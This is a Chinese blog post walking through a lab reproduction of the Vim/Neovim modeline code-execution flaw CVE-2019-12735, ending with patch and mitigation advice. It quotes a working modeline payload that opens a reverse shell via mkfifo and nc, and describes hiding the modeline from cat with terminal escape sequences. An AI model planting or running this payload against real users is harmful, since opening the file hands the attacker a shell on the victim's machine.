CVE-2019-12735-----Linux Vim编辑器任意代码执行漏洞

最新推荐文章于 2023-02-21 15:10:01 发布
最新推荐文章于 2023-02-21 15:10:01 发布
阅读量473 收藏
点赞数 1
分类专栏: 漏洞复现 Linux操作系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/per_se_veran_ce/article/details/99694051
版权

一、实验环境

kali本机上测试
不同虚拟机存放vimrc文件路径不同

二、前提条件
(1)影响版本:小于8.1.1365

vim --help查看版本信息
在这里插入图片描述

(2)检查是否存在vim漏洞

打开vim输入 :set modeline? 检查modelines是否启用。
如果vim返回nomodeline,就说明不存在漏洞。
如果vim返回modeline,就说明存在漏洞。

(3)开启modeline选项

kali的vimrc路径存放在/usr/share/vim下,编辑此文件
在第50行加入set modeline
在这里插入图片描述

三、漏洞复现

(1)在github上下载脚本:https://github.com/pcy190/ace-vim-neovim/

poc_uname.txt 是试着运行查看系统
poc_shell.txt 是创建一个反弹shell

:!rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1  9999 >/tmp/f||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

在这里插入图片描述

(2)尝试vim打开poc_uname.txt过程中是否可以运行uname命令

下图表示运行成功
在这里插入图片描述

(3)监听反弹端口
在这里插入图片描述
(4)利用nc反弹shell

本PoC给出了当用户打开文件时启动逆向shell的真实攻击方法。为了隐藏攻 击活动,该文件打开后需要马上重新。当文件内容用cat显示时,PoC使用了terminal escape序列来隐藏modeline。cat -v会显示文件真实内容。
在这里插入图片描述在这里插入图片描述

(5)如果要在两台机子上验证,可修改poc_shell.txt里的ip和任意端口号

kali目标机:192.168.168.176
kali攻击机:192.168.168.157

修改ip值
在这里插入图片描述
创建用户vimuser
在这里插入图片描述

攻击机开启监听,目标机vim打开poc_shell.txt脚本
在这里插入图片描述
在这里插入图片描述

由此可见,获取到了目标机的权限

四、补丁

Vim patch 8.1.1365
Neovim patch (released in v0.3.6)

关闭modelines,在vimrc中加入以下代码:
set modelines=0
set nomodeline

per_se_veran_ce
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vim任意代码执行漏洞CVE-2019-12735
Sylon的博客
06-10 2361
Vim通过Modelines执行任意代码 漏洞概要: 在8.1.1365之前的Vim和在0.3.6之前的Neovim很容易通过打开特制的文本文件而通过模型执行任意代码。 复现条件: 确保未禁用modeline选项(:set modeline)。 开启 modeline # vim /usr/share/vim/vimrc 大概在50行写入 :set modeline 复现过程: 1....
CVE-2019-12735Vim远程代码执行漏洞复现
锋刃科技的博客
06-25 882
前言 该漏洞存在于编辑器的 modeline功能,部分 Linux 发行版默认启用了该功能,macOS 是没有默认启用。 影响版本 Vim < 8.1.1365 Neovim < 0.3.6 测试环境 Vim版本8.1.948 漏洞复现 参考:https://github.com/pcy190/ace-vim-neovim/ 由于这个版本没有默认开启modeline,所以需要自己手动添加下,修改home/.vimrc文件,添加一条规则se...
漏洞复现----CVE-2019-12735 vim编辑器任意代码执行漏洞复现及利用
wwl012345的博客
08-22 837
一、事件背景 2019年6月4日,爆出来关于VIM漏洞,攻击者可以通过向受害者发送一个恶意代码,如果用户使用VIM打开该代码,那么攻击者可以控制用户的计算机。 二、影响版本 Vim < 8.1.1365 Neovim < 0.3.6 三、前提条件 (1):vim版本小于8.1.1365 (2):开启modeline,部分 Linux 发行...
基于VIM漏洞CVE-2019-12735VIM宏后门病毒详解
systemino的博客
06-14 437
0×00 引言 作为一个vim多年使用者,前两天得知爆出个VIM的RCE漏洞搞的我有点害怕,因此特意对这个漏洞的利用进行了一些研究。由于本人是个菜的抠脚的脚本小子,因此并不会在这篇文章中去给大家解释漏洞原因,作为脚本小子我只关心如何利用。至于漏洞原因的一些解释可以去原作者的git上去看:原作者GitHub链接。 0×01 漏洞复现 先讲一下如何漏洞复现,复现该漏洞的基本条件是: 1.Vim...
vim编辑器任意代码执行漏洞复现
qq_41976183的博客
08-18 558
1、vim编辑器漏洞介绍 vim编辑器在8.1.1365之前的版本都存在任意代码执行漏洞,通过打开伪造的文本文件通过modeline功能来执行任意代码。 2、实验过程 1)测试环境:kali linux 实验开始以前先查看一下vim编辑器的版本,看看是否存在此漏洞: vim 该版本符合要求。 2)创建poc PoC:测试代码,对具体应用或者服务器的验证性测试 确保mod...
CVE-2019-12735 VIM命令执行漏洞利用
weixin_30853329的博客
06-15 129
操作系统:Kali Linux VIM版本:VIM - Vi IMproved 8.1.693 (2018 May 18, compiled Jan 05 2019 20:53:12) 因为vim默认关闭modeline,所以首先要手工设置modeline。 第1步:开启modeline 在用户家目录(如:/root/)下创建.vimrc文件,文件内容为: set modeline ...
vim for windows
04-10
用于windows下面的vim编辑器。 给喜欢vim的人使用。详细如下: 好吧,详细点,这里写出一些基本的命令: 【什么是vi】 vi就是linux命令行下的最著名的编辑器之一,(编辑器就是类似windows记事本的功能,不过vi功能比记事本强大无限倍!^_^),现在实际使用的都是vim,它是vi的改进版本,所以现在的vi基本上就是vim了。 【vi能做什么】 第一个功能不用多说,vi可以编辑文本文件。至于其他的功能,多得无法列举,我只说我所知的一些典型的功能应用: (1)编辑文本文件 (2)方便地阅读程序源代码 (3)当文件目录浏览器来用 (4)提供编程、调试环境 (5)利用vi执行一些脚本文件(vi有自己的脚本文件语法) (x)等等等等...... 【vi的操作模式】   vi具有两种基本模式,为输入模式(或插入模式、编辑模式)和指令模式(或命令模式)。输入模式下输入字符,文本就会显示在屏幕上;而指令模式下输入字符就解释为一个输入命令并执行,而不会显示相应的字符。理解指令模式最简单方式就是想象平时剪切、复制以及粘贴数据时所发生的情况。 使用[Esc]键可以停止当前操作(插入或者命令)重新回到指令模式,准备接受新的指令。如果本来就在指令模式下面,将会响铃一下。 【最基本的使用】 这里提供了使用vi得最基本的操作,能够实现大多数的编辑目的。如果你肯花几分钟把“最基本的使用”的内容都实践一下,那么你至少可以独立地在vim中朝你想要得方向“前进”了。如果你不想学习,那么就把它当作一个“字典”吧。 *用vi打开一个文件: 输入“vi filename”. 这里,filename就是你要打开的文件的名字,默认打开文件后vi处于指令模式。 *进入编辑模式编辑打开的文件: 输入“i”. 或输入“a”. 进入编辑模式后,你可以直接敲入想要输入的字符到文件,两者的区别是i在当前字符前面开始插入,a在当前字符后面开始插入。 *退出编辑模式: 输入“[Esc]”. 这样,将返回指令模式,准备接收你要传达给vi的指令并执行,如果之前已经在指令模式下,那么系统将响铃提醒一下。 **以下命令都是在命令模式下进行: *撤销修改: 输入“u”. 这里,相比以前的vi来说,vim支持多步撤销。 *恢复修改: 输入“[Ctrl]r”. 这里,和撤销命令相反,是撤销的撤销,也可多步。 *复制行到剪切板: 输入“yy”. *复制选定内容到剪切板: (1)输入“v”。 (2)按方向键将高亮选择的内容。 (3)输入“y”。 这里,开始输入v使vi临时进入了一个"选择模式",输入方向键可以选择,输入y将选择的内容复制剪切板。 *删除行: 输入“dd”. 注意,vi的删除等价于剪切,删除的内容会保存到剪切板中。 *删除选定内容: (1)输入“v”。 (2)按方向键将高亮选择的内容。 (3)输入“d”。 这里,开始输入v使vi临时进入了一个“选择模式”,输入方向键可以选择,输入d将选择的内容删除。 *粘贴: 输入“p”. 这样会将剪切板的内容粘贴到光标位置或者光标下一行。 *查找字符并定位到第一个匹配处: 输入“/character”. 这里character是待查找的字符,只要先输入/,再输入待查字符,最后回车即可定位到第一个匹配的字符处。 *定位到匹配查找的下一个字符处: 输入“n”. *定位到匹配查找的上一个字符处: 输入“N”. *保存文件: 输入“:w”. 注意w前面的':',输入':'之后,vim会将':'之后的输入解释为待执行的指令。 *退出: 输入“:q”. 这里,如果文件没有保存,将提示无法退出,除非你强制退出,不保存文件,或者保存退出。 *强制退出: 输入“:q!”. *保存退出: 输入“:wq”. 或输入“ZZ”. *察看帮助 输入":help". ** 另外还有一个简易的教程: 输入命令:vimtutor.
CVE-2019-12814:CVE-2019-12814
05-26
**CVE-2019-12814:Jackson数据绑定库的远程代码执行漏洞** CVE-2019-12814是一个针对Java Jackson数据绑定库的重大安全漏洞,该漏洞允许攻击者通过恶意构造的JSON输入在解析过程中执行任意代码,从而可能导致系统...
vim编辑器漏洞复现
weixin_42750666的博客
08-20 219
影响版本:Vim < 8.1.1365, Neovim < 0.3.6 实验环境: 实验主机:kali linux 实验主机的vim编辑器版本:8.0.1766 实验前提: 实验主机开启modeline 在/usr/share/vim/vimrc里写入set modeline 实验过程: 新建poc.txt文件 :!uname -a||" vi:fen:fdm=e...
文本编辑器Vim/Neovim任意代码执行漏洞CVE-2019-12735
weixin_30666943的博客
06-06 134
受影响版本: Vim < 8.1.1365, Neovim < 0.3.6 前提:开启modeline 0x01 开启modeline 在你的home下的.vimrc文件中增加一行: set modeline 0x02 Poc 创建文件poc.txt,内容为 :!uname -a||" vi:fen:fdm=expr:fde=assert_fai...
网站漏洞修复之vim文本编辑BUG分析与修复方案
网站安全专家
06-14 343
linux系统一直以来都是比较安全的,不管是系统内核还是一些第三方软件都没有太大的漏洞,包括前几年爆出的redis漏洞,没有太多漏洞,然后最近linux频频爆出高危的漏洞,使用vim文本编辑器很多年了,得知被爆出远程代码执行漏洞,有点不可思议,全国大多数的linux服务器都使用的是vim,包括centos系统,redhat,关于该漏洞的详情以及修复方案,我们SINE安全来详细的跟大家介绍一下: ...
修复vim输入验证漏洞
qyvlik的专栏
07-25 1154
修复vim输入验证漏洞 centos 6, vim 7, CVE-2016-1248
Linuxvim拒绝服务安全漏洞修复
最新发布
cnskylee的博客
02-21 3712
根据国家信息安全漏洞共享平台于2023年2月19日发布的安全漏洞通知,Linux系统自带的vim编辑器存在两个高危安全漏洞(CNVD-2023-09166、CNVD-2023-09647),攻击者可以利用该漏洞发起拒绝服务攻击,并可能运行(恶意)代码。首先,我们在vim的github发布页面找到最新版的源码包(v9.0.1333),这里我们下载.tar.gz的源码包。安装完成后,会在/root目录下生成一个bin目录,里面有最新编译生成的二进制文件。用编译文件覆盖/usr/bin目录下的组件。
利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞CVE-2016–3714)
JiangBuLiu的博客
07-10 1877
Imagetragick 命令执行漏洞CVE-2016–3714)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置上传POC反弹shell POC Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/imagemagick/imagetragick/README.zh-cn.md 漏...
ES文件管理器未授权访问漏洞CVE-2019-6447)
公众号shadow sock7
01-20 3859
漏洞描述 在受害者ES文件管理器启动一次后,会开放TCP端口59777作为HTTP服务器。攻击者可在没有访问控制的wifi环境下通过构造json请求,读取受害者的文件,启动受害者任意app。受害者手机无需root,攻击者也无需授权凭据。 影响范围: ES文件管理器 4.1.9.7.4 and below 经测试在root和非root手机上4.1.9.4版本ES文件管理器(http://shouji...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值